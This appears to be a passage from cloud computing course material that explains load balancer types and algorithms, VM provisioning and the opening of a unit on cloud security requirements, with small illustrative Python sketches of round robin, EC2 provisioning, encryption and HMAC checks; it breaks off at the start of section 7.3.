Hardware Appliance, Virtual Appliance, and Software Native Load Balancing ADCs are all
subcategories of ADCs. Cloud computing now allows software-based ADCs to perform the
same functions as their hardware counterparts, but with greater scalability, capability, and
adaptability than ever before.
In cloud computing, load balancing is the process of distributing workloads and computing
resources. Enterprises can distribute resources over multiple computers, networks, and
servers in order to better manage workload demands or application requirements. In the
cloud, load balancing is the process of maintaining the flow of Internet traffic and requests
for workloads.
Internet traffic continues to expand at a rate of over 100 percent every year. Servers are
becoming overloaded due to a rapid increase in demand, which is especially true for web
servers that are widely used. Solutions to the problem of server overloading can be found in
two simple ways:
The first option is to update the server to a higher-performance model. It's possible that the
new server will get overcrowded and require a second upgrade. In addition, updating is a
lengthy and expensive undertaking.
In the second case, a cluster of servers is used to create an extensible service system. Because
of this, building a server cluster system for network services is more cost-effective and
scalable than a single server.
All kinds of services, from HTTP to SMTP to DNS to FTP to POP/IMAP can benefit from
load balancing. Redundancy also increases reliability. There is a dedicated hardware device
or software programme that provides the balancing service for you. It is possible to achieve
more precise scalability and availability for cloud-based server farms by implementing server
load balancing.
Comprehending how load balancers work:
Your server's Load Balancer is a traffic controller that distributes requests to the most
appropriate server for the task at hand. As a result of this, no server is overworked, ensuring
that performance is not degraded.
Load Balancer aids in the selection of the server best suited to handle the requests when an
organization is trying to satisfy application demand. As a result, the user has a better
experience.
The load balancer manages data flow from the server to the endpoint device by assisting with
the efficient movement of servers. Additionally, the server's request-handling health is
checked, and if it is found to be sick, Load Balancer removes it until it is repaired.
A load balancer can be either a hardware device or a software-based virtual one, depending
on whether the servers are physical or virtual. Requests are sent to the remaining servers
when a server goes down, and requests are instantly moved to the newly added server when a
server is added.
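The behaviour described above can be sketched as a minimal round-robin load balancer with health
checks. This is only an illustration; the class, method and server names are assumptions, and real
load balancers add many more features (weights, session persistence, connection draining, etc.).

import itertools

class LoadBalancer:
    def __init__(self, servers):
        self.servers = servers
        self.healthy = set(servers)
        self._rr = itertools.cycle(servers)

    def mark_down(self, server):
        self.healthy.discard(server)      # failed health check: stop routing to it

    def mark_up(self, server):
        self.healthy.add(server)          # recovered: resume routing

    def route(self, request):
        # Hand the request to the next healthy server in round-robin order.
        for _ in range(len(self.servers)):
            server = next(self._rr)
            if server in self.healthy:
                return request + " -> " + server
        raise RuntimeError("no healthy servers available")

lb = LoadBalancer(["web-1", "web-2", "web-3"])
lb.mark_down("web-2")
print(lb.route("GET /index.html"))        # web-1
print(lb.route("GET /index.html"))        # web-3 (web-2 is skipped)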
Load balancer types according to their functions:
When it comes to specific network challenges, there are a number of load balancing strategies
to consider:
Network Load Balancer / Layer 4 (L4) Load Balancer :
Load balancing is the allocation of traffic at transport level through routing decisions based
on network factors such as IP addresses and destination ports. Such load balancing is TCP i.e.
level 4, and doesn't take into account any parameters at the application level, such as the kind
of content or cookie data or headers or locations. Network Load Balancing does not examine
the content of individual packets while performing network addressing translations. Instead,
it merely looks at the network layer information and routes traffic based on this.
Application Load Balancer / Layer 7 (L7) Load Balancer:
Load balancing at the highest level of the OSI model, Layer 7, distributes requests depending
on a variety of application-level characteristics. When distributing server load, the L7 load
balancer considers a broader variety of data, including HTTP headers and SSL sessions, and
makes decisions based on the combination of those elements. To regulate server traffic
depending on individual use and behavior, application load balancers use this method.
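The difference between the two levels can be shown with a small, purely illustrative Python sketch:
a layer 4 decision can only look at addresses and ports, while a layer 7 decision can inspect the
HTTP path and headers. The pool names below are hypothetical.

def l4_route(src_ip, dst_port):
    # Only network level fields (addresses, ports) are visible at layer 4.
    return "pool-a" if hash((src_ip, dst_port)) % 2 == 0 else "pool-b"

def l7_route(path, headers):
    # Layer 7 can use application data such as URL paths and cookies.
    if path.startswith("/images/"):
        return "static-content-pool"
    if "session-id" in headers:
        return "sticky-app-pool"          # keep the user on the same backend
    return "default-app-pool"

print(l7_route("/images/logo.png", {}))                  # static-content-pool
print(l7_route("/checkout", {"session-id": "abc123"}))   # sticky-app-pool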
Global Server Load Balancer/Multi-site Load Balancer:
Worldwide load balancing (GSLB) is an extension of the typical L4 and L7 capabilities of
cloud data centres situated in diverse locations, allowing for efficient global load distribution
without harming the end user experience. When tragedy strikes at one data centre or another,
multi-site load balancers ensure business continuity by distributing traffic over many data
centres, making it possible to quickly recover and continue operations even in the event of a
disaster.
Different Types of Load Balancers, Each with a Special Function:
Software-based load balancers:
In the same way that hardware load balancing works, these are software programmes that
need to be loaded in the system. Commercial and open-source versions are available, and
they're cheaper than hardware alternatives. When using software-based load balancing, you
don't need any special gear or software. The Problem Statement in Load Balancing.
Hardware-based load balancer:
A hardware-based load balancer is a dedicated device built for a specific purpose, much like a
router or firewall. Such devices typically use application-specific integrated circuits (ASICs)
to perform load balancing at the transport level. Because hardware-based load balancing is
significantly faster than software-based solutions, ASIC-based devices are frequently employed
to handle network traffic at high speeds.
Virtual Load Balancers:
Load balancing on a virtual computer is what sets this load balancer apart from traditional
software and hardware load balancers.
Because it uses virtualization, this type of load balancer runs the software of a hardware
load balancing appliance on a virtual machine, which then reroutes traffic as needed. However,
these load balancers share the same issues as physical on-premises balancers, namely a lack of
central control, limited scalability, and severely constrained automation.
Major Load Balancing Devices are listed here:
Direct Routing Request Dispatching Technique:
IBM's Net Dispatcher uses this style of request dispatching. The virtual IP
address is shared by both the real server and the load balancing service. The load
balancer takes an interface configured with the virtual IP address, accepts request packets and
directs the packets to the selected servers.
Dispatcher-Based Load Balancing Cluster:
A dispatcher uses server availability, workload, capabilities, and other user-defined criteria to
determine where a TCP/IP request should be sent. If you have multiple servers in a cluster,
the dispatcher module of a load balancer can be used to distribute HTTP requests. Customers
interact as if it were a single server, since the dispatcher distributes the workload across a
large number of nodes in the cluster, making the services provided by each node appear to be
a single virtual service with only a single IP address.
Linux Virtual Load Balancer:
An open-source advanced load balancing solution used to build highly scalable and highly
available network services such as HTTP, POP3, FTP, SMTP, media and VoIP services.
Designed for load balancing and failover, it is an easy-to-use yet powerful tool. IP
Virtual Server (IPVS), which implements transport-layer load balancing inside the
Linux kernel, is the primary entry point of the server cluster system and is used to
accomplish Layer-4 switching.
Why is it imperative in cloud computing to balance the cloud load?
In the cloud, load balancing is critical for the following reasons.
Load balancing technology is less costly and easier to use than other options. Firms may now
give greater outcomes at a cheaper cost by using this technology.
The scalability of cloud load balancing can help manage website traffic. High-end network
and server traffic may be effectively managed using effective load balancers. In order to
manage and disperse workloads in the face of numerous visitors every second, e-commerce
businesses rely on cloud load balancing.
Load balancers can deal with any abrupt spikes in traffic. For example, if there are too many
requests for university results, the website may be shut down. It is unnecessary to be
concerned about the flow of traffic while using a load balancer. Whatever the scale of the
traffic, load balancers will evenly distribute the website's load over several servers, resulting
in the best outcomes in the shortest amount of time.
The primary benefit of utilizing a load balancer is to ensure that the website does not go
down unexpectedly. This means that if a single node fails, the load is automatically shifted to
another node on the network. It allows for more adaptability, scalability, and traffic handling.
Load balancers are useful in cloud systems because of these qualities. This is to prevent a
single server from taking on too much weight.
Importance of Load Balancing:
Few industries are developing as quickly as the information technology sector. Cloud
computing, by generating and exchanging vast amounts of data over the network, has allowed
firms to better capitalize on their substantial expenditures.
Thanks to the cloud, businesses can now use virtualized computing resources that are often
shared among many users, and cloud-based services are already the norm for most
businesses.
Everyone who uses cloud computing or plans to use it should be familiar with the notion of
load balancing.
Improved Performance:
Load balancing strategies are less costly and simpler to install than their equivalents.
Organizations can work on their clients' apps considerably faster and give better results at a
cheaper cost.
Keep Website Traffic Up:
Scalability is provided by Cloud Balancing to regulate website traffic. With the aid of
excellent load balancers, you can effortlessly handle high-end user traffic in the presence of
servers and network devices.
Cloud balancing is critical for e-commerce companies like Amazon and Flipkart, which deal
with millions of visits per second. Load balancers assist them in distributing and managing
workloads during promotional and sales activities.
The ability to deal with unexpected traffic surges is essential:
When a sudden influx of traffic is received, load balancers can handle it. A college or
university website, for example, may go offline during the announcement of results if there
are an excessive number of requests arriving at the same time.
They won't have to worry about traffic spikes if they're utilizing load balancers. In order to
provide the best possible performance with the shortest possible response time, load
balancers evenly distribute the entire website's load over many servers.
Flexibility:
Load balancing is used to prevent the website from experiencing a sudden outage. It is
possible to divide the burden among a number of network units or servers, even if a node
fails. This demonstrates the system's scalability, flexibility, and capacity to handle traffic.
Goals of Load Balancing:
Since the dawn of cloud computing, load balancing has grown from a niche function to a
critical component. Each device in a cloud network is designed to handle a specific amount of
traffic.
Levels of Load Balancing:
Virtual Machine Provisioning:
Virtual Machine Provisioning Analogy:
It used to take the IT administrator a great deal of time and effort to set up a new server for a
certain workload or to provide a specific service for a client. A new machine had to be
purchased, formatted, installed with the required operating system, and finally installed with the
necessary services. In addition to the server itself, a number of security appliances were also
required.
With the advent of cloud computing and the IaaS paradigm enabled by virtualization
technologies, accomplishing the same thing takes only a few minutes. To get what you want, all you
have to do is use a self-service portal to provision a virtual server with the necessary
requirements. A public cloud like Amazon Elastic Compute Cloud (EC2) or a private cloud
management solution placed in your data centre can be used to provision the virtual machine
within your organization and within the private cloud setup, or you can use a combination of
both.
Life Cycle of Virtual Machine Provisioning:
The cycle begins when an IT department receives a request for a new server for a certain
service.
The IT administration then checks the servers' resource pool and matches the available
resources to the requirements, after which provisioning of the required virtual
machine gets under way. As soon as it has been provisioned and started, it can offer
the service specified in the SLA. Finally, when the service is no longer required, the virtual
machine is released and its resources are freed back into the pool.
Process of Virtual Machine Provisioning:
The most common and typical steps in deploying a virtual server are:
First, select a server from the pool of available physical servers with sufficient capacity,
together with an appropriate OS template.
Next, install the proper software needed for this task (the operating system you selected in
the previous step, device drivers, middleware, and the applications needed for the service
required).
Then customise and configure the machine's network and storage resources (e.g., IP address
and gateway).
With the newly installed software, the virtual server is now ready for use.
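As a concrete, hedged illustration of provisioning through a self-service API, the sketch below uses the boto3 library against Amazon EC2. The AMI ID, key pair and subnet are hypothetical placeholders and would differ in a real account; this is a sketch of the idea, not a prescribed procedure.

    # Hedged sketch: provisioning a virtual server on Amazon EC2 with boto3.
    # The ImageId, KeyName and SubnetId values are placeholders, not real resources.
    import boto3

    ec2 = boto3.resource("ec2", region_name="us-east-1")

    instances = ec2.create_instances(
        ImageId="ami-0123456789abcdef0",      # OS template chosen from a catalogue
        InstanceType="t3.micro",              # capacity of the requested server
        MinCount=1,
        MaxCount=1,
        KeyName="my-keypair",                 # credentials for later configuration
        SubnetId="subnet-0123456789abcdef0",  # network placement (IP, gateway)
        TagSpecifications=[{
            "ResourceType": "instance",
            "Tags": [{"Key": "Name", "Value": "provisioned-by-portal"}],
        }],
    )

    instances[0].wait_until_running()          # block until the VM is usable
    print("Provisioned:", instances[0].id)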
Summary: Server provisioning is the process of determining an organization's specific
hardware and software requirements in order to create a customised server environment
(processor, RAM, storage, networking, operating system, applications, etc.).
Typically, virtual machines can be deployed by manually installing an operating system,
using a prepackaged VM template, cloning an existing VM, or importing a physical server or
a virtual server from another hosting platform. Using P2V (Physical to Virtual) tools and
techniques, it is possible to virtualize and provision physical servers as well (e.g., virt-p2v).
Once a physical machine has been virtualized, or a new virtual server has been created in the
virtual environment, a template can be created from it.
Such tasks can be easily accomplished by administrators of virtualization management
systems (VMware, XenServer, etc.) who have access to the tools they need.
Migrating a virtual machine from one physical host to another while it's powered on is known
as live migration (also known as hot or real-time migration).
IaaS Clouds and Virtual Machine Management: Virtual machine management in this type of
cloud is the focus of this section. Cloud service providers, such as those mentioned above, all
have the following characteristics:
Using virtualization technologies, they lease computing power to their clients; they provide
public and simple remote interfaces to manage those resources; they charge by the hour; and
their data centres are large enough to provide a seemingly unlimited amount of resources to
their clients (usually touted as 'infinite capacity' or 'unlimited elasticity'). Rather than selling
capacity across public interfaces, private and hybrid clouds focus on supplying capacity to an
organization's internal customers.
OpenNebula's VM Model and Lifecycle: In OpenNebula, the lifecycle of a virtual machine
passes through several stages:
Resource selection. Once a VM has been requested, OpenNebula needs a plan for where to
place it. Using information from the VMs and the physical hosts, site managers can configure
OpenNebula's default scheduler to prioritise the resources that are best suited for a VM.
OpenNebula can also use Haizea's lease manager to enable more complex scheduling
policies.
Resource preparation. Deployment of the virtual machine's disc images begins. During the
boot phase the VM's disc images are contextualized to work in a specific environment. If the
VM is part of a larger group of VMs that together provide an application or other service
(such as a compute cluster or a database-based application), contextualization may require
setting up the network and the machine hostname, or registering the new virtual machine
with a service (e.g., the head node in a compute cluster). The node can be contextualized by
an automatic installation system (like Puppet or Quattor), a context server, or a disc image
containing the worker node's context data (OVF recommendation).
Termination of the virtual machine. When the VM is about to shut down, its disc images can
be returned to a known place, and changes made to the VM can be saved for future reference.
Resource Provisioning:

Resource provisioning techniques are classified into two groups based on the application's
needs:
Static Resource Provisioning:
Static provisioning can be used efficiently for any application that has predictable and fixed
demands. When beginning the programme, the user must provide certain needs so that the
service provider can meet them.
Dynamic Resource Provisioning:
Dynamic provisioning allows the resources allocated to a VM to be adjusted on the fly if the
demands on it change unexpectedly. In this situation, the service provider provides more
virtual machines (VMs) if necessary, and removes them if they are no longer needed.
Response speed, workload, reduced SLA violations, and other factors are all taken into
account when allocating resources.
While completing the task, the resource provisioning algorithm must reply in the shortest
amount of time possible. This software must be able to minimize SLA violations while also
taking into account the workload of each VM.
Resource provisioning approaches must be utilized in order to get the most out of cloud
resources. For example, resource provisioning based on deadlines, cost analyses, and service
level agreements are all common approaches that scholars have advocated for managing
various aspects of resource allocation.
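A very simple way to picture dynamic provisioning is a control loop that compares observed load against thresholds and adds or removes VMs accordingly. The sketch below is illustrative only; the thresholds, the monitoring function and the provision/release callbacks are assumed stand-ins for a real monitoring service and cloud API.

    # Illustrative dynamic-provisioning loop (not tied to any real provider API).
    import time

    SCALE_UP_AT = 0.80     # average utilisation above which a VM is added
    SCALE_DOWN_AT = 0.30   # average utilisation below which a VM is removed
    MIN_VMS, MAX_VMS = 1, 10

    def average_utilisation(vms):
        # Placeholder: a real system would query a monitoring service here.
        return sum(vm["cpu"] for vm in vms) / len(vms)

    def provisioning_loop(vms, provision_vm, release_vm):
        while True:
            load = average_utilisation(vms)
            if load > SCALE_UP_AT and len(vms) < MAX_VMS:
                vms.append(provision_vm())      # demand rose: add capacity
            elif load < SCALE_DOWN_AT and len(vms) > MIN_VMS:
                release_vm(vms.pop())           # demand fell: give capacity back
            time.sleep(60)                      # re-evaluate once a minute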
Categories of Load Balancing:
You may need to consider specific types of load balancing for your network, such as SQL
Server load balancing for your relational database, global server load balancing for
troubleshooting across many geographic locations, and DNS server load balancing to ensure
domain name operation. You can also consider load balancer types in terms of the many
cloud-based balancers available (such as the well-known AWS Elastic Load Balancer).
Static Algorithm Approach:
This type of method is used when the load on the system is relatively predictable and hence
static. Because of the static method, all of the traffic is split equally amongst all of the
servers. Implementing this algorithm effectively calls for extensive knowledge of server
resources, which is only known at implementation time.
However, the decision to shift load does not take into account the current state of the system.
A key limitation of a static load balancing method is that the assignment of jobs is fixed once
it has been made, so the load cannot be transferred to other devices at run time.
Dynamic Algorithm:
The dynamic process begins by locating the lightest-loaded server in the network and assigning
it priority for load balancing. This may require real-time communication across the network,
which can add traffic to the system. The key feature of dynamic algorithms is that decisions
are made in the context of the present system state, and processes can be transferred from
heavily loaded machines to lightly loaded machines in real time.
Round Robin Algorithm:
As its name implies, this algorithm assigns jobs in a round-robin fashion. The initial node is
chosen at random, and subsequent jobs are assigned to the remaining nodes in circular order.
This is one of the simplest strategies for distributing the load on a network.
Processes are assigned in turn with no regard for priority, and the method responds quickly
when the workload is evenly distributed across the processes. However, the processing time
of each job varies, so some nodes may be underutilized while others are overburdened.
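A round-robin dispatcher can be written in a few lines; the minimal sketch below simply cycles through an assumed server list in order.

    # Round-robin assignment: requests go to servers strictly in rotation.
    from itertools import cycle

    servers = ["server-a", "server-b", "server-c"]   # hypothetical nodes
    rotation = cycle(servers)

    def assign(request_id):
        return next(rotation)

    for i in range(6):
        print(i, "->", assign(i))   # a, b, c, a, b, c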
Weighted Round Robin Load Balancing Algorithm:
The Weighted Round Robin algorithm was created to address the most problematic aspect of
plain Round Robin: each server is assigned a weight, and work is distributed in proportion to
these weight values.
Higher-capacity servers are given higher weights and consequently receive a larger share of
the work. Once every server is operating at its weighted capacity, it sees a steady stream of
traffic.
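One common way to realise weighted round robin is to expand each server into the rotation as many times as its weight, so higher-capacity servers receive proportionally more requests. A minimal sketch, with assumed weights:

    # Weighted round robin: a server with weight 3 appears three times in the cycle.
    from itertools import cycle

    weights = {"big-server": 3, "medium-server": 2, "small-server": 1}  # assumed
    schedule = cycle([name for name, w in weights.items() for _ in range(w)])

    for _ in range(6):
        print(next(schedule))   # big x3, medium x2, small x1, then repeats

Production balancers usually interleave the weighted slots more smoothly, but the proportion of traffic each server receives is the same.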
Opportunistic Load Balancing Algorithm:
The opportunistic load balancing (OLB) technique ensures that each node is always busy. It
does not take into account how much work each node is currently doing: unfinished jobs are
distributed among all nodes regardless of their current burden.
Because the execution time of a job on a node is not taken into account, jobs may take a long
time to complete under OLB, and bottlenecks can occur even when some nodes remain
available.
Minimum To Minimum Load Balancing Algorithm:
In minimum-to-minimum (min-min) load balancing, the algorithm works with the tasks that
have the smallest completion times. The task with the overall minimum completion time is
chosen first and assigned to the corresponding machine, and that machine's schedule is
updated with the execution time of the assigned task.
The assigned job is then deleted from the list and the completion times of the remaining tasks
are updated. This procedure is repeated up to the final assignment. The method is most
effective when a large number of small jobs must be performed.
Dynamic Approach:
During runtime, it may dynamically detect the amount of load that needs to be shed and
which system should carry the load.
Dynamic Load Balancing:
Least connection:
Verifies and transmits traffic to those servers that have the fewest connections open at any
one moment. All connections are assumed to demand nearly equal processing power in this
scenario.
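The least-connection choice reduces to picking the server with the smallest count of currently open connections, as in this small sketch (the connection counts are assumed for illustration):

    # Least connection: send the next request to the server with the fewest
    # active connections at this moment.
    active_connections = {"server-a": 12, "server-b": 7, "server-c": 9}  # assumed

    def least_connection():
        return min(active_connections, key=active_connections.get)

    target = least_connection()
    active_connections[target] += 1      # the new request now counts against it
    print("Routed to", target)           # server-b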

Weighted least connection:


If certain servers are better at handling connections than others, managers have the option to
give them various weights.
Weighted response time:
Each server's response time and the number of open connections are averaged together to
decide where traffic should be sent. The algorithm provides speedier service for consumers
by directing traffic to servers with the fastest response times.
Resource-based:
Based on the amount of resources each server has available at any one time, it distributes the
load. The load balancer asks each server's "agent" to determine the server's CPU and memory
capacity before allocating traffic to that server.
UNIT 7 SECURITY ISSUES IN CLOUD
COMPUTING
Structure

7.0 Introduction
7.1 Objectives
7.2 Cloud Security
7.2.1 How Cloud Security is Different from Traditional IT Security?
7.2.2 Cloud Computing Security Requirements
7.3 Security Issues in Cloud Service Delivery Models
7.4 Security Issues in Cloud Deployment Models

7.4.1 Security Issues in Public Cloud


7.4.2 Security Issues in Private Cloud
7.4.3 Security Issues in Hybrid Cloud
7.5 Ensuring Security in Cloud Against Various Types of Attacks
7.6 Identity and Access Management (IAM)
7.6.1 Benefits of IAM
7.6.2 Types of Digital Authentication
7.6.3 IAM and Cloud Security
7.6.4 Challenges in IAM
7.6.5 Right Use of IAM Security
7.7 Security as a Service (SECaaS)
7.7.1 Benefits of SECaaS
7.8 Summary
7.9 Solutions/Answers
7.10 Further Readings

7.0 INTRODUCTION

The rise of cloud computing as an ever-evolving technology brings with it a


number of opportunities and challenges. Cloud is now becoming the back end
for all forms of computing, including the ubiquitous Internet of Things.

In the earlier unit, we had studied Load Balancing in Cloud computing and in
this unit we will focus on another important aspect namely Cloud Security in
cloud computing.

Cloud security is a discipline of cyber security dedicated to secure cloud


computing systems. This includes keeping data private and safe across online-
based infrastructure, applications, and platforms. Securing these systems
involves the efforts of cloud providers and the clients that use them, whether the
client is an individual, a small to medium business, or an enterprise.

Cloud providers host services on their servers through always-on internet


connections. Since their business relies on customer trust, cloud security
methods are used to keep client data private and safely stored. However, cloud

security also partially rests in the client’s hands as well. Understanding both
facets is pivotal to a healthy cloud security solution.

At its core, cloud security is composed of the following components:

 Data security
 Identity and access management (IAM)
 Governance (policies on threat prevention, detection, and mitigation)
 Data retention (DR) and business continuity (BC) planning
 Legal compliance

In this unit, you will study what is cloud security, how it is different from
traditional(legacy) IT security, cloud computing security requirements,
challenges in providing cloud security, threats, ensuring security, Identity and
Access management and Security-as-a-Service.

7.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand cloud security and how it is different to that of traditional IT


security;
 list and describe various cloud computing security requirements;
 describe the challenges in providing cloud security;
 discuss various types of threats with respect to types of cloud services
and cloud deployment models;
 discuss different techniques to ensure cloud security against various
types of threats,
 elucidate the importance of identity and access management; and
 explain Security-as-a-Service

7.2 CLOUD SECURITY

Cloud security is the whole bundle of technology, protocols, and best practices
that protect cloud computing environments, applications running in the cloud,
and data held in the cloud. Securing cloud services begins with understanding
what exactly is being secured, as well as, the system aspects that must be
managed.

As an overview, backend development against security vulnerabilities is


largely within the hands of cloud service providers. Aside from choosing a
security-conscious provider, clients must focus mostly on proper service
configuration and safe use habits. Additionally, clients should be sure that any
end-user hardware and networks are properly secured.

The full scope of cloud security is designed to protect the following, regardless
of your responsibilities:

 Physical networks — routers, electrical power, cabling, climate


controls, etc.
 Data storage — hard drives, etc.
 Data servers — core network computing hardware and software
 Computer virtualization frameworks — virtual machine software,
host machines, and guest machines
 Operating systems (OS) — software that houses
 Middleware — application programming interface (API) management,
 Runtime environments — execution and upkeep of a running program
 Data — all the information stored, modified, and accessed
 Applications — traditional software services (email, tax software,
productivity suites, etc.)
 End-user hardware — computers, mobile devices, Internet of Things
(IoT) devices etc..

Cloud security may appear like traditional (legacy) IT security, but this
framework actually demands a different approach. Before diving deeper, let’s
first look how this is different to that of legacy IT security in the next section.

7.2.1 How Cloud Security is Different from Traditional IT Security?

Traditional IT security has felt an immense evolution due to the shift to cloud-
based computing. While cloud models allow for more convenience, always-on
connectivity requires new considerations to keep them secure. Cloud security,
as a modernized cyber security solution, stands out from legacy IT models in a
few ways.

Data storage: The biggest distinction is that older models of IT relied heavily
upon onsite data storage. Organizations have long found that building all IT
frameworks in-house for detailed, custom security controls is costly and rigid.
Cloud-based frameworks have helped offload costs of system development and
upkeep, but also remove some control from users.

Scaling speed: On a similar note, cloud security demands unique attention


when scaling organization IT systems. Cloud-centric infrastructure and apps
are very modular and quick to mobilize. While this ability keeps systems
uniformly adjusted to organizational changes, it does pose concerns when an
organization’s need for upgrades and convenience outpaces their ability to
keep up with security.

End-user system interfacing: For organizations and individual users alike,


cloud systems also interface with many other systems and services that must be
secured. Access permissions must be maintained from the end-user device
level to the software level and even the network level. Beyond this, providers
and users must be attentive to vulnerabilities they might cause through unsafe
setup and system access behaviors.

Proximity to other networked data and systems: Since cloud systems are a
persistent connection between cloud providers and all their users, this
substantial network can compromise even the provider themselves. In
networking landscapes, a single weak device or component can be exploited to
infect the rest. Cloud providers expose themselves to threats from many end-
users that they interact with, whether they are providing data storage or other
services. Additional network security responsibilities fall upon the providers
who otherwise delivered products live purely on end-user systems instead of
their own.

Solving most cloud security issues means that users and cloud providers, in both
personal and business environments, remain proactive about their own
roles in cyber security. This two-pronged approach means users and providers
must mutually address:

 Secure system configuration and maintenance.


 User safety education, both behaviorally and technically.

Ultimately, cloud providers and users must have transparency and


accountability to ensure both parties stay safe.

7.2.2 Cloud Computing Security Requirements

There are four main cloud computing security requirements that help to ensure
the privacy and security of cloud services: confidentiality, integrity,
availability, and accountability.

Confidentiality

Confidentiality requires blocking unauthorized exposure of cloud computing


service user’s information. Cloud providers are charged with guaranteeing
confidentiality; the focus is on authentication of cloud resources (e.g.,
requiring a username and password for each user). Moreover, access control is
an important part of confidentiality in cloud computing. Neither access control
nor authentication works with a compromised cloud computing system, as it is
much harder to block unauthorized information disclosure on such a system.
Many approaches to protecting users’ sensitive cloud data are based on
encryption and data segmentation. If a provider’s server is compromised, data
segmentation reduces the amount of sensitive data that is disclosed. Data
segmentation also has other advantages; for instance, if the entire server is
compromised, only a small amount of user data is leaked, and downtime is
reduced. A covert channel is another potential confidentiality issue in a cloud
computing system; covert channels can cause information leaks through
unauthorized transmission paths.

Cloud computing providers use the service-level agreement (SLA) method to
resolve security issues for customers. Thus, providers of cloud services should
work together to create standards for SLAs. Virtualization is the main aspect of the cloud
computing system; therefore many researchers have proposed techniques for
using virtualized systems to implement security goals.

Confidentiality is a part of cloud service that the provider must guarantee,


along with control of the cloud infrastructure. The provider should guarantee
confidential access to the data by ensuring trusted data sharing or through the
use of authorized data access. Therefore, as cloud computing systems grow, there
remain significant challenges in balancing the privacy of the user with the security of the
data.
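Encryption is one of the main tools mentioned above for protecting the confidentiality of data placed in the cloud. As a hedged illustration (using the third-party Python cryptography package, which may or may not be what a given provider uses), data can be encrypted on the client side before upload so that the provider only ever stores ciphertext:

    # Client-side encryption before uploading to cloud storage, so a compromised
    # server discloses only ciphertext. Requires the 'cryptography' package.
    from cryptography.fernet import Fernet

    key = Fernet.generate_key()        # must be stored safely outside the cloud
    cipher = Fernet(key)

    plaintext = b"customer record: account 1234, balance 987"
    ciphertext = cipher.encrypt(plaintext)     # what actually goes to the provider

    # Later, after downloading the object back from the cloud:
    assert cipher.decrypt(ciphertext) == plaintext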

Integrity

One goal of using cloud computing systems is to utilize a variety of resources.


That is why cloud platforms support all kinds of data and why many users stick to the
same clouds. Users also desire the ability to change or update existing data or
to add new data to the cloud. Therefore, data access should be controlled to
ensure data integrity. As with confidentiality, integrity requires access control
and authentication. Thus, if the cloud system is compromised by a weak
password, the cloud data’s integrity will not be protected. To overcome this
huge challenge, providers use virtualization-based dynamic integrity to help
clients use cloud services without interrupting the providers’ work with other
clients. Such a method is useful for ensuring integrity and security with
satisfactory performance and cost. Another method, value-at-risk, helps to
ensure suitable security and integrity. Cloud-based governance design
principles guarantee integrity and security by controlling the path between the
provider and the enterprise client. Another method provides a test of
information integrity based on a Service Level Agreement (SLA) between the
provider and the client. The consumer can use this SLA to verify the accuracy
of the cloud information. In a blind execution of services, the client transfers
each type of information through the cloud computing system using a separate
process. In the trusted computing method, blind processing is used to ensure
the integrity of the client’s data. This method separates the execution
environment from the system, so that the system’s hardware and computing
base can be secured and the credentials’ accuracy can be verified.
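A simple way for a client to verify that data retrieved from the cloud has not been altered is to keep a keyed digest of it, along the lines of the standard-library sketch below (the key and document are purely illustrative):

    # Integrity check: compute an HMAC before uploading, recompute after download,
    # and compare the two with a constant-time comparison.
    import hashlib
    import hmac

    secret_key = b"client-held-secret"            # never shared with the provider
    document = b"quarterly report v1"

    tag = hmac.new(secret_key, document, hashlib.sha256).hexdigest()

    def verify(downloaded: bytes, expected_tag: str) -> bool:
        recomputed = hmac.new(secret_key, downloaded, hashlib.sha256).hexdigest()
        return hmac.compare_digest(recomputed, expected_tag)

    print(verify(document, tag))                          # True
    print(verify(b"quarterly report v1 (edited)", tag))   # False: integrity violated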

Availability

Availability is the ability of the consumer to utilize the system as expected.
One of the significant advantages of cloud computing is its data availability.
Cloud computing enhances availability through authorized entry. In addition,
availability requires timely support and robust equipment. A client’s
availability may be ensured as one of the terms of a contract; to guarantee
availability, a provider may secure huge capacity and excellent architecture.
Because availability is a main part of the cloud computing system, increased
use of the environment will increase the possibility of a lack of availability and
thus could reduce the cloud computing system’s performance. Cloud
computing affords clients two ways of paying for cloud services: on-demand
resources and (the cheaper option) resource reservation. The optimal virtual-
machine (VM) placement mechanism helps to reduce the cost of both payment
methods. By reducing the cost of running VMs for many cloud providers, it
supports expected changes in demand and price. This method involves the
client making a declaration to pay for certain resources owned by the cloud
computing providers using the Session Initiation Protocol (SIP) optimal
solution.

Accountability

Accountability involves verifying the clients’ various activities in the data


clouds. Accountability is achieved by verifying the information that each client
supplies (and that is logged in various places in information clouds). Directly
connecting all activities to a client’s account is not always satisfactory. Neither
the client nor the provider takes all the responsibility for a system breakdown.
Thus, both the client and the provider must maintain accountability in case
disputes occur. Thus, one of them will need to log any incidents for future
auditing, clearly identify each incident, and provide the necessary equipment
for logging such transactions. As an example, when a client’s account is
compromised in an attack, the client can no longer perform certain activities.
Thus, the cloud service providers need to have saved sufficient information to
restore the compromised account and identify the exceptional behavior.
Tracing even the smallest actions that happen in the clouds could ensure
accountability; such tracking will identify the client or entity that is responsible
for any given disaster. Evidence should be logged for each activity once it
starts processing. The transaction log can then be used during the examination
to determine the aptness of the evaluation. Accountability is a challenge in a
cloud system because misconfigured devices can produce unreliable
calculation results. In addition, when clients rent insufficient resources for their
tasks, this could reduce the performance of the provided services. A virus can
also destroy clients’ data, and a provider can fail to deliver data on time or
even lose data.

7.2.3 Challenges in Cloud Security

Following are some of the key security challenges in cloud computing:

Authentication: Data stored by a cloud user travels over the internet and may become
available to unauthorized people. Hence, the authenticated user and the serving cloud
must share a mutual identity management entity.

Access Control: To verify and admit only legitimate users, the cloud must have the
right access control policies. Such services must be flexible, well planned,
and conveniently administered. The access control provision must be integrated on the
basis of the Service Level Agreement (SLA).

Policy Integration: There are many cloud providers, such as Amazon and Google,
which are accessed by end users. Since each provider uses its own policies and approaches,
conflicts between their policies should be kept to a minimum.

Service Management: Different cloud providers, such as Amazon and
Google, may combine their offerings to build newly composed services that meet their
customers' needs. At this stage the composed service should be properly partitioned so that
the simplest localized services can be obtained.

Trust Management: Since the cloud environment is service-provider oriented, a trust
management approach must be developed that includes trust negotiation
between both parties, i.e. the user and the provider. For example, to release
their services the provider must have some degree of trust in the user, and users must have
similar trust in the provider.

In the following sections let us discuss major threats and issues in cloud
computing with respect to the cloud service delivery models and cloud
deployment models.

 Check Your Progress 1

1) Why security is important in Cloud?

…………………………………………………………………………………………
…………………………………………………………………………………………
…………………………………………………………………………………………
2) How does cloud security work?

…………………………………………………………………………………………
…………………………………………………………………………………………
3) Mention various cloud security risks and discuss briefly.
…………………………………………………………………………………………
…………………………………………………………………………………………

7.3 SECURITY ISSUES IN CLOUD SERVICE


DELIVERY MODELS

The main concern in cloud environments is to provide security around multi-


